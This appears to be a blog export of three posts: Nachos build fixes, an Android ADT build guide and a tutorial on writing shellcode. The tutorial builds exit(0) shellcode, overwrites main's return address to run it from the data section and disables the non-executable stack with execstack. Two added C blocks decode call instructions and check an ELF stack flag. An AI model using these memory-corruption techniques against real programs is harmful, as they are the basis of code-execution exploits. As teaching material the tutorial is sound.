<span class="Apple-style-span" style="font-family: 'Franklin Gothic Book',serif;"><span class="Apple-style-span" style="border-collapse: collapse;">solution:</span></span><br />
<span class="Apple-style-span" style="font-family: 'Franklin Gothic Book',serif;"><span class="Apple-style-span" style="border-collapse: collapse;"> use any text editor to change the Makefile. </span></span><br />
<span class="Apple-style-span" style="font-family: 'Franklin Gothic Book',serif;"><span class="Apple-style-span" style="border-collapse: collapse;"> Change</span></span><br />
<span class="Apple-style-span" style="font-family: 'Franklin Gothic Book',serif;"><span class="Apple-style-span" style="border-collapse: collapse;"> <b> MAKE = </b></span></span><b><strike>gmake</strike> make</b><br />
Second:<br />
The second problem is in ../lib/sysdep.h:<br />
iostream.h is not found.<br />
solution:<br />
simply change the<b> <iostream.h> to <iostream></b> and add a new line: using namespace std;<br />
Third:<br />
The reason for the third problem is the gcc version.<br />
solution:<br />
use a text editor to modify Makefile.common,<br />
and change the line "CFLAGS = -g -Wall <strike>-fwritable-strings</strike> ........" by removing the struck-out flag<br />
Fourth:<br />
The terminal will echo many errors.<br />
solution:<br />
The solution is very simple: add <b><i>this-></i></b> in front of the variables or functions named in the errors.<br />
<br />
That's it, Nachos is built. Enjoy.<br />
<br />
Here is the video tutorial by Isaias<br />
<div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='480' height='390' src='https://www.youtube.com/embed/plGyUq4PcVA?feature=player_embedded' frameborder='0'></iframe></div> <br />
The original link:<a href="http://os-fime.blogspot.com/2011/08/how-to-compile-nachos.html">http://os-fime.blogspot.com/2011/08/how-to-compile-nachos.html </a><br />
<br />
reference website:<a href="http://neuron.csie.ntust.edu.tw/homework/99/OS/homework/homework1/B9715017-hw1-1/#ubuntu10">http://neuron.csie.ntust.edu.tw/homework/99/OS/homework/homework1/B9715017-hw1-1/#ubuntu10</a>Anonymoushttp://www.blogger.com/profile/17959708504094936061noreply@blogger.com3tag:blogger.com,1999:blog-1191178933370250826.post-52116433061330100812011-05-02T03:49:00.000-07:002011-07-08T11:08:38.157-07:00Shell codeAfter studying computer science for about two years, I have changed my view of executable files.<br />
An executable format may contain many sections, such as .text (where your code is stored) and .data (where your global and static variables are stored)...<br />
Have you ever wondered what happens if we store executable bytes in the .data section? This is what shellcode is.<br />
<br />
Here is an example to demonstrate how it works.<br />
My environment is Ubuntu 10.10 and the gcc version is 4.4.5.<br />
First, write a simple program which does nothing at all.<br />
<br />
<br />
<span style="font-family: 'Courier New', Courier, monospace;">example1.c</span><br />
<div style="color: black;"><span style="font-family: 'Courier New', Courier, monospace;">#include <stdlib.h></span></div><div style="color: black;"><span style="font-family: 'Courier New', Courier, monospace;"><br />
</span></div><div style="color: black;"><span style="font-family: 'Courier New', Courier, monospace;">int main()</span></div><div style="color: black;"><span style="font-family: 'Courier New', Courier, monospace;">{</span></div><div style="color: black;"><span style="font-family: 'Courier New', Courier, monospace;"> exit(0);</span></div><div style="color: black;"><span style="font-family: 'Courier New', Courier, monospace;"> return 0;</span></div><span style="font-family: 'Courier New', Courier, monospace;"><span style="color: black;">}</span></span><br />
<br />
<br />
makefile:<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">gcc -g -static -o example1.out example1.c </span> //compile the source file with static link<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">objdump -D example1.out >> example1.dump</span> //dump the executable file<br />
<br />
Now let's see what happened by looking at example1.dump.<br />
<br />
<span style="font-family: 'Courier New', Courier, monospace;">080482c0 <main></span><br />
<span style="font-family: 'Courier New', Courier, monospace;">80482c0: 55 push %ebp</span><br />
<span style="font-family: 'Courier New', Courier, monospace;">80482c1: 89 e5 mov %esp,%ebp<br />
80482c3: 83 e4 f0 and $0xfffffff0,%esp<br />
80482c6: 83 ec 10 sub $0x10,%esp<br />
80482c9: c7 04 24 00 00 00 00 movl $0x0,(%esp)<br />
80482d0: e8 db 08 00 00 call 8048bb0 <exit></span><br />
<br />
<br />
<i>The first two instructions set up the stack frame of main.</i><br />
<i>The third instruction aligns the stack pointer.</i><br />
<i>The last two instructions store the argument on the stack and call exit.</i><br />
What we are interested in is the last two instructions.<br />
<br />
<br />
Let's write a second example.<br />
<span style="font-family: 'Courier New', Courier, monospace;"><i><br />
</i></span><br />
<span style="font-family: 'Courier New', Courier, monospace;"><i>example2.c</i></span><br />
<div style="color: black;"><span style="font-family: 'Courier New', Courier, monospace;"><i>#include <stdlib.h><br />
int main()<br />
{<br />
asm("movl $0x0,(%esp);\<br />
call 0x8048bb0;\<br />
");<br />
}</i></span></div><br />
<br />
Let's see the dump file.<br />
<span style="font-family: 'Courier New', Courier, monospace;">080482c0 <main>:</span><br />
<span style="font-family: 'Courier New', Courier, monospace;">80482c0: 55 push %ebp<br />
80482c1: 89 e5 mov %esp,%ebp<br />
80482c3: c7 04 24 00 00 00 00 movl $0x0,(%esp)<br />
80482ca: <b><span style="color: red;">e8 e1 08 00 00 call 8048bb0 <exit></span></b></span><br />
<br />
<br />
Now let's turn it into shellcode.<br />
But before we do that, there is something we should know first.<br />
When gcc translates the assembly into machine code, it uses a relative call, which reaches the function by an offset from the current instruction.<br />
Therefore, when we turn this into shellcode, the address will be different depending on where your shellcode is located.<br />
Therefore, we need to use an absolute call instead of a relative call.<br />
Let's first write it in assembly.<br />
<span style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span style="font-family: 'Courier New', Courier, monospace;">example3.c</span><br />
<span style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<div style="color: black;"><span style="font-family: 'Courier New', Courier, monospace;">#include <stdlib.h><br />
int main()<br />
{<br />
asm("movl $0x0,(%esp);\<br />
movl $0x8048bb0,%eax;\<br />
call *%eax;\<br />
");<br />
}</span></div>and the dump file:<br />
<span style="font-family: 'Courier New', Courier, monospace;">080482c0 <main>:<br />
80482c0: 55 push %ebp<br />
80482c1: 89 e5 mov %esp,%ebp<br />
80482c3: c7 04 24 00 00 00 00 movl $0x0,(%esp)<br />
80482ca: b8 b0 8b 04 08 mov $0x8048bb0,%eax<br />
80482cf: <b><span style="color: red;">ff d0 call *%eax</span></b><br />
80482d1: 5d pop %ebp<br />
80482d2: c3 ret</span><br />
<br />
In example3 the highlighted line is the main difference: the opcode byte becomes 0xff instead of 0xe8.<br />
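To check the dumps above the way a disassembler does, here is an added C example (not code from the original post) that decodes the E8 rel32 call from the example2 dump and the B8/FF D0 pair from the example3 dump; the byte arrays are copied from those dumps, and the second address, 0x80ce02f, is the shellcode+7 address gdb reports later in the post.<br />

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Bytes copied from the post's example2 dump: "e8 e1 08 00 00" at 0x80482ca,
 * which objdump resolved to 8048bb0 <exit>. */
static const unsigned char EXAMPLE2_CALL[5] = { 0xe8, 0xe1, 0x08, 0x00, 0x00 };
/* Bytes copied from the post's example3 dump: mov $0x8048bb0,%eax ; call *%eax. */
static const unsigned char EXAMPLE3_CALL[7] = { 0xb8, 0xb0, 0x8b, 0x04, 0x08, 0xff, 0xd0 };

static uint32_t le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Decode a 32-bit x86 "call rel32" (opcode E8) whose first byte sits at address
 * `at`. The displacement is signed and counted from the end of the 5-byte
 * instruction, so the target moves whenever the bytes move. Returns 0 on success. */
int decode_rel_call(uint32_t at, const unsigned char *code, size_t len, uint32_t *target)
{
    if (len < 5 || code[0] != 0xe8) return -1;
    int32_t rel = (int32_t)le32(code + 1);
    *target = at + 5 + (uint32_t)rel;
    return 0;
}

/* Decode the "mov $imm32,%eax ; call *%eax" pair (B8 imm32 FF D0). The target is
 * the immediate itself and does not depend on where the bytes are placed. */
int decode_abs_call_via_eax(const unsigned char *code, size_t len, uint32_t *target)
{
    if (len < 7 || code[0] != 0xb8 || code[5] != 0xff || code[6] != 0xd0) return -1;
    *target = le32(code + 1);
    return 0;
}

int main(void)
{
    uint32_t t = 0;
    /* At its original address the relative call resolves to exit, as in the dump. */
    decode_rel_call(0x80482ca, EXAMPLE2_CALL, sizeof EXAMPLE2_CALL, &t);
    printf("e8 call at 0x80482ca -> 0x%08x\n", t);
    /* The same five bytes at 0x80ce02f (shellcode+7 in the gdb session) resolve
     * somewhere else entirely, which is why the post switches to call *%eax. */
    decode_rel_call(0x80ce02f, EXAMPLE2_CALL, sizeof EXAMPLE2_CALL, &t);
    printf("e8 call at 0x80ce02f -> 0x%08x\n", t);
    decode_abs_call_via_eax(EXAMPLE3_CALL, sizeof EXAMPLE3_CALL, &t);
    printf("mov/call *%%eax anywhere -> 0x%08x\n", t);
    return 0;
}
```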
Now let's turn the bytes at 0x80482c3 through 0x80482cf into shellcode.<br />
<br />
<span style="font-family: 'Courier New', Courier, monospace;">example4.c</span><br />
<div style="color: black;"><span style="font-family: 'Courier New', Courier, monospace;">#include <stdlib.h><br />
char shellcode[] = "\xc7\x04\x24\x00\x00\x00\x00\xb8\xb0\x8b\x04\x08\xff\xd0";<br />
int main()<br />
{<br />
int *ptr;<br />
int i;<br />
for(i=0;i<10;i++)<br />
{<br />
ptr = (int*)&ptr+i;<br />
(*ptr) = (int)shellcode;<br />
}<br />
return 0; <br />
}</span></div><br />
You may wonder what the purpose of the for loop and the int pointer is.<br />
When we have finished writing the shellcode, the executable bytes are in the data section.<br />
Therefore we need to find a way to transfer control to the shellcode.<br />
The method I used is to overwrite the return address of the main function, so that when main returns, it returns to the shellcode instead of to the caller.<br />
<br />
Now execute it, and you will get a segmentation fault.<br />
It's time to use gdb to debug this program.<br />
<i><span style="font-family: 'Courier New', Courier, monospace;"><br />
</span></i><br />
<i><span style="font-family: 'Courier New', Courier, monospace;">(gdb) disassem main<br />
Dump of assembler code for function main:<br />
0x080482c0 <+0>: push %ebp<br />
0x080482c1 <+1>: mov %esp,%ebp<br />
0x080482c3 <+3>: sub $0x10,%esp<br />
0x080482c6 <+6>: movl $0x0,-0x8(%ebp)<br />
0x080482cd <+13>: jmp 0x80482eb <main+43><br />
0x080482cf <+15>: lea -0x4(%ebp),%eax<br />
0x080482d2 <+18>: mov -0x8(%ebp),%edx<br />
0x080482d5 <+21>: shl $0x2,%edx<br />
0x080482d8 <+24>: add %edx,%eax<br />
0x080482da <+26>: mov %eax,-0x4(%ebp)<br />
0x080482dd <+29>: mov -0x4(%ebp),%eax<br />
0x080482e0 <+32>: mov $0x80ce028,%edx<br />
0x080482e5 <+37>: mov %edx,(%eax)<br />
0x080482e7 <+39>: addl $0x1,-0x8(%ebp)<br />
0x080482eb <+43>: cmpl $0x9,-0x8(%ebp)<br />
0x080482ef <+47>: jle 0x80482cf <main+15><br />
0x080482f1 <+49>: mov $0x0,%eax<br />
0x080482f6 <+54>: leave <br />
0x080482f7 <+55>: ret <br />
End of assembler dump.</span></i><br />
<span style="font-family: 'Courier New', Courier, monospace;">(<i>gdb) b *(main+55)<br />
Breakpoint 1 at 0x80482f7: file example4.c, line 13.</i></span><br />
<span style="font-family: 'Courier New', Courier, monospace;"><i>(gdb) r<br />
Starting program: example4.out Breakpoint 1, 0x080482f7 in main () at example4.c:13<br />
13 }</i></span><br />
<span style="font-family: 'Courier New', Courier, monospace;"><i>(gdb) x/a $esp<br />
0xbffff2ec: 0x80ce028 <shellcode><br />
(gdb) x/3i 0x80ce028<br />
0x80ce028 <shellcode>: movl $0x0,(%esp)<br />
0x80ce02f <shellcode+7>: mov $0x8048bb0,%eax<br />
0x80ce034 <shellcode+12>: call *%eax</i><br />
</span><br />
<span style="font-family: 'Courier New', Courier, monospace;"><i>(gdb) disassem exit<br />
Dump of assembler code for function exit:<br />
0x08048bd0 <+0>: push %ebp<br />
0x08048bd1 <+1>: mov %esp,%ebp<br />
0x08048bd3 <+3>: sub $0x18,%esp<br />
0x08048bd6 <+6>: mov 0x8(%ebp),%eax<br />
0x08048bd9 <+9>: movl $0x1,0x8(%esp)<br />
0x08048be1 <+17>: movl $0x80ce03c,0x4(%esp)<br />
0x08048be9 <+25>: mov %eax,(%esp)<br />
0x08048bec <+28>: call 0x8048ad0 <__run_exit_handlers><br />
End of assembler dump.</i></span><br />
<br />
<br />
Oh no, the address of exit() has changed.<br />
This may be our problem; let's modify the shellcode.<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">example5.c</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span style="font-family: 'Courier New', Courier, monospace;"><b style="color: black;">#include <stdlib.h><br />
char shellcode[] = "\xc7\x04\x24\x00\x00\x00\x00<span style="color: red;">\xb8\xd0\x8b\x04\x08</span>\xff\xd0";<br />
int main()<br />
{<br />
int *ptr;<br />
int i;<br />
for(i=0;i<10;i++)<br />
{<br />
ptr = (int*)&ptr+i;<br />
(*ptr) = (int)shellcode;<br />
}<br />
return 0; <br />
}</b></span><br />
<br />
Compile it and execute it, and we still get a segmentation fault.<br />
Let's use gdb again.<br />
<span style="font-family: 'Courier New', Courier, monospace;">(gdb) b *(main+55)<br />
Breakpoint 1 at 0x80482f7: file example5.c, line 13.<br />
(gdb) r<br />
Starting program: example5.out</span><br />
<span style="font-family: 'Courier New', Courier, monospace;">Breakpoint 1, 0x080482f7 in main () at example5.c:13<br />
13 }<br />
<i>(gdb) x/a $esp<br />
0xbffff2ec: 0x80ce028 <shellcode><br />
(gdb) x/3i 0x80ce028<br />
0x80ce028 <shellcode>: movl $0x0,(%esp)<br />
0x80ce02f <shellcode+7>: mov $0x8048bd0,%eax<br />
0x80ce034 <shellcode+12>: call *%eax<br />
(gdb) x/i exit<br />
0x8048bd0 <exit>: push %ebp</i></span><br />
<br />
Everything looks OK, so where is the problem?<br />
The cause of this problem is the non-executable stack.<br />
Type sudo apt-get install execstack in your command shell, then run<br />
<span style="font-family: 'Courier New', Courier, monospace;"> execstack -s example5.out</span><br />
After that the program finally finishes as expected.<br />
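The non-executable stack that stopped example5 is a property recorded in the binary's PT_GNU_STACK program header, and execstack -s simply sets that header's executable flag (on 32-bit x86 Linux the kernel then also maps the rest of the process, .data included, as executable, which is why bytes in the data section could run). Added here as a defender's check, not part of the original post: a small C parser that reads that header from an ELF32 image, so a binary can be audited before and after execstack. The sample image it builds is constructed and the function names are my own; the numeric constants are the standard ELF values.<br />

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constants from the ELF specification and the GNU ABI extension. */
#define PT_GNU_STACK_TYPE 0x6474e551u   /* p_type of the GNU_STACK program header */
#define PF_X_FLAG         0x1u          /* p_flags bit: segment is executable */

enum stack_policy { STACK_BAD_ELF = -1, STACK_NX = 0, STACK_EXEC = 1, STACK_NO_HEADER = 2 };

static uint32_t rd32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static uint16_t rd16(const unsigned char *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static void wr32(unsigned char *p, uint32_t v)
{
    p[0] = v & 0xff; p[1] = (v >> 8) & 0xff; p[2] = (v >> 16) & 0xff; p[3] = (v >> 24) & 0xff;
}

/* Walk the program headers of an in-memory little-endian ELF32 image and report
 * the stack policy it requests: STACK_EXEC is what "execstack -s" produces,
 * STACK_NX is what a normal gcc build carries. */
int elf32_stack_policy(const unsigned char *img, size_t len)
{
    if (len < 52 || memcmp(img, "\x7f" "ELF", 4) != 0) return STACK_BAD_ELF;
    if (img[4] != 1 || img[5] != 1) return STACK_BAD_ELF;  /* ELFCLASS32, ELFDATA2LSB only */
    uint32_t phoff = rd32(img + 28);
    uint16_t phentsize = rd16(img + 42), phnum = rd16(img + 44);
    if (phentsize < 32) return STACK_BAD_ELF;
    for (unsigned i = 0; i < phnum; i++) {
        size_t off = (size_t)phoff + (size_t)i * phentsize;
        if (off > len || len - off < 32) return STACK_BAD_ELF;   /* header past end of image */
        const unsigned char *ph = img + off;
        if (rd32(ph) == PT_GNU_STACK_TYPE)
            return (rd32(ph + 24) & PF_X_FLAG) ? STACK_EXEC : STACK_NX;
    }
    return STACK_NO_HEADER;   /* no GNU_STACK header: the kernel's per-arch default applies */
}

/* Read a file from disk and classify it, e.g. example5.out before and after execstack -s. */
int elf32_file_stack_policy(const char *path)
{
    FILE *f = fopen(path, "rb");
    if (!f) return STACK_BAD_ELF;
    long sz = (fseek(f, 0, SEEK_END) == 0) ? ftell(f) : -1;
    unsigned char *buf = (sz > 0) ? malloc((size_t)sz) : NULL;
    if (!buf) { fclose(f); return STACK_BAD_ELF; }
    rewind(f);
    size_t got = fread(buf, 1, (size_t)sz, f);
    fclose(f);
    int rc = elf32_stack_policy(buf, got);
    free(buf);
    return rc;
}

/* Build a constructed minimal ELF32 image: a header followed by one PT_GNU_STACK
 * program header carrying `flags` (6 = RW, 7 = RWX). Returns the image size. */
size_t build_sample_elf(unsigned char out[84], uint32_t flags)
{
    memset(out, 0, 84);
    memcpy(out, "\x7f" "ELF", 4);
    out[4] = 1; out[5] = 1; out[6] = 1;        /* 32-bit, little-endian, EV_CURRENT */
    out[16] = 2; out[18] = 3;                   /* ET_EXEC, EM_386 */
    out[28] = 52;                               /* e_phoff: right after the 52-byte header */
    out[40] = 52; out[42] = 32; out[44] = 1;    /* e_ehsize, e_phentsize, e_phnum */
    wr32(out + 52, PT_GNU_STACK_TYPE);
    wr32(out + 52 + 24, flags);
    return 84;
}

int main(int argc, char **argv)
{
    static const char *names[] = { "non-executable stack", "executable stack", "no PT_GNU_STACK header" };
    unsigned char img[84];
    if (argc > 1) {
        int p = elf32_file_stack_policy(argv[1]);
        printf("%s: %s\n", argv[1], p < 0 ? "not a little-endian ELF32 file" : names[p]);
        return p < 0;
    }
    printf("constructed RW  image: %s\n", names[elf32_stack_policy(img, build_sample_elf(img, 6))]);
    printf("constructed RWX image: %s\n", names[elf32_stack_policy(img, build_sample_elf(img, 7))]);
    return 0;
}
```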
<br />
next article: <a href="http://mike820324.blogspot.com/2011/06/shellcode-cont.html">shell code 2 (cont.)</a><br />
reference website:<br />
<a href="https://paulmakowski.wordpress.com/2011/01/25/smashing-the-stack-in-2011/">https://paulmakowski.wordpress.com/2011/01/25/smashing-the-stack-in-2011/</a><br />
<a href="http://stackoverflow.com/questions/5850524/buffer-overflow-problem">http://stackoverflow.com/questions/5850524/buffer-overflow-problem </a>Anonymoushttp://www.blogger.com/profile/17959708504094936061noreply@blogger.com5tag:blogger.com,1999:blog-1191178933370250826.post-82961122475485883642011-04-20T10:32:00.000-07:002011-06-29T08:22:48.714-07:00building the android adt for eclipseAfter building the Android source code and the SDK, I tried to build the ADT as well.<br />
But remember that when you make the ADT, the Android build deletes the .sdk and .img files generated from the Android source code. (It took me a lot of time to make the image files T T)<br />
Therefore, my advice is to back up those files before building the Android ADT.<br />
<br />
OS: ubuntu 10.10<br />
java version: sun-jdk1.5<br />
<br />
OK, now this is how I built my Android ADT.<br />
1. Download Eclipse from <a href="http://www.eclipse.org/downloads/">here</a>. (I prefer to download it manually; when I used apt-get install eclipse, the build failed.)<br />
P.S. I prefer the RAP and RCP version (since the package is smaller).<br />
<br />
2. After downloading, extract the file to any directory you want.<br />
for example: ~/eclipse<br />
<br />
3. set the environment variable ECLIPSE_HOME.<br />
export ECLIPSE_HOME=${the directory you extract your eclipse}<br />
<br />
4. The final step is to build the ADT using the script contained in the source code.<br />
${android home}/tools/eclipse/scripts/build_server.sh ${destination-directory}<br />
<span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;"><span class="Apple-style-span" style="font-size: 13px; line-height: 17px;">P.S. The build_server.sh script may be in a different folder depending on which version of the source code you downloaded.</span></span><br />
<span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;"><span class="Apple-style-span" style="font-size: 13px; line-height: 17px;"> ${android home} is where your android source code is</span></span><br />
<span class="Apple-style-span" style="font-size: 13px; line-height: 17px;"><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;"> ${destination-directory} is where you want to put your ADT zip file.</span></span><br />
<span class="Apple-style-span" style="font-size: 13px; line-height: 17px;"><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;"><br />
</span></span><br />
<span class="Apple-style-span" style="font-size: 13px; line-height: 17px;"><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;">After all these steps, you can see a zip file in your destination folder.</span></span><br />
<span class="Apple-style-span" style="font-size: 13px; line-height: 17px;"><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;"><br />
</span></span><br />
<span class="Apple-style-span" style="font-size: 13px; line-height: 17px;"><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;">reference website: <a href="http://funkie921.blogspot.com/2009/04/build-android-development-toolkit-kit.html">Build android device tool for eclipse</a></span></span><br />
<span class="Apple-style-span" style="color: #000066; font-family: arial, Sans-erif; font-size: x-small;"><span class="Apple-style-span" style="line-height: 17px;"><b><br />
</b></span></span>Anonymoushttp://www.blogger.com/profile/17959708504094936061noreply@blogger.com0